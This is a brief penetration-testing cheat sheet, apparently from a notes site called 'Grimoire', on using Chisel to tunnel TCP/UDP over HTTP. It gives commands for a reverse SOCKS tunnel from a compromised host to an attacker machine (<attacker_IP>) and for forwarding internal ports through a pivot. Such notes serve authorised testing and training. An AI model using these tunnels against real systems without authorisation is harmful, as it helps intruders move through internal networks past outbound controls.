Chisel - Grimoire

TCP/UDP tunnel over HTTP: useful when only port 80/443 is allowed outbound, or when you need a quick SOCKS proxy through a compromised host.

Reverse SOCKS Tunnel

Run the server on your attack box with --reverse, then have the target connect out. The SOCKS proxy binds on your side at port 1080.

chisel server -p 8000 --reverse

./chisel client <attacker_IP>:8000 R:socks

Forward a specific remote port to your local machine: useful for reaching a service on an internal host through the pivot.

chisel server -p 8000

./chisel client <attacker_IP>:8000 <local_port>:<target_IP>:<target_port>

⌘I